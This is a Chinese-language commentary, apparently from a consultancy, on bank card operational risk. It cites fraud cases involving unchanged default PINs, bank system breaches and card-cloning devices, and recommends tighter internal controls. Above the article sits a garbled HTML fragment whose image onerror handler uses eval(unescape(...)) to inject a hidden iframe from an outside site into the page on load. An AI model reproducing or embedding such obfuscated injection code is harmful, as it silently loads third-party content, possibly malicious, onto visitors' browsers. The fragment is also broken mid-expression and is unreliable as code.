xxx系统存在漏洞 银行需加强风险管制

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zh_160_600.html%20frameBorder%3D0%20width%3D160%20scrolling%3Dno%20height%3D600%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

　　　　摘要：xxx业务在个人零售业务中的战略地位更加凸现，但在xxx业务中，操作风险对信用卡业务的影响也逐渐显现，银行工作人员未按照规范化的作业流程操作、逆向操作或计算机系统操作失误以及对外围设备失控，致使业务中断而影响客户用卡，已经影响到银行业务开展及银行声誉。
　　成都市民郭桦持太平洋卡到交通银行取款时被告知，卡上的3万多元已经没有了，不能取款。查看存取清单，发现钱被分为7次用电话转账的方式转到了殷沙萍的卡上，而这位叫殷沙萍的人也是受害者，他卡上的2万多元包括郭先生的31840元被人分多次在取款机上取走了。原委是郭先生并未签约xxxx银行业务，并且《太平洋卡用户手册》明确规定“转账功能必须在网点办理签约手续”，但银行认为，该行的电话银行业务一直是对持卡人开通的，办卡时就同时设置了电话银行的查询密码。郭先生未对电话银行的初始密码进行修改，因此，犯罪嫌疑人得以利用。
　　 xxx操作存在隐患
　　从本次事件成因的分析，风险的产生与管理不善、规章制度存在缺陷等有直接或必然的关系，银行违规操作等仍是案件发生的主要或者是直接的原因。各银行对进入xxx管理系统的操作要求不同，有的要3人的密钥才能进入，有的2人即可，甚至有的是单人操作。单人操作存在严重的安全隐患。
　　 银行系统存在漏洞
　　银行往往声称他们的密钥达到了国际先进水平，他们的平台若金汤，一是他们对计算机知识缺乏相当的了解；二是银行为了向国际靠拢，有的项目匆匆上马；三是对网上平台的监视不力，粗心大意，认为没谁能攻破。但是事实是银行的系统屡屡被攻破。一个只有初中文化的男青年尤昌杰，凭着对网络和数字编码技术的“潜心钻研”，攻破了福州市某银行的储户账号系统，利用少数持卡人对xxx初始密码不加更改这一漏洞，在短短50多天内，作案134起，盗窃存款总计30余万元。重庆市万州区某职业学院通信工程系二年级学生赵永春和该学院副院长攻破了工行网上支付系统。
　　 xxx加密技术含量不足
　　 xxx加密技术含量不足，网上竟然有出售复制xxx设备的。出售者称该设备可能任意复制多张和母卡具有相同功能的xxx，并且每张卡都可以各自取款。并且声称该设备主要用于因为怕母卡丢失而对xxx备份，请勿使用设备恶意复制xxx窃取资金。
　　中金亿观点
　　 与银行传统的信贷业务相比，xxx的业务处理有其自身的特点,特别是大部分业务处理环节都已经通过计算机实现，需要针对其操作风险表现形式、风险点存在环节，制定专门的内控操作流程。
　　银行应及时找准卡业务的主要风险环节及其产生原因，在申请审核环节、xx及成品卡管理环节、持卡使用环节、业务管理与协调环节等强化措施、加大力度。明确卡业务风险防范措施，通过强化从业人员的风险管理意识、制定严格可行的风险管理措施，提高风险管理的水平和能力。
　　 应加强和其他兄弟银行之间的合作、信息共享；加强与公安、司法部门的联系，合力打击包括借记卡在内的各种xxx犯罪活动；同时加强与国际信用卡组织、先进国家和地区银行同业的信息沟通和联系，学习其防范和化解风险的先进经验，以促进xxx风险管理的水平。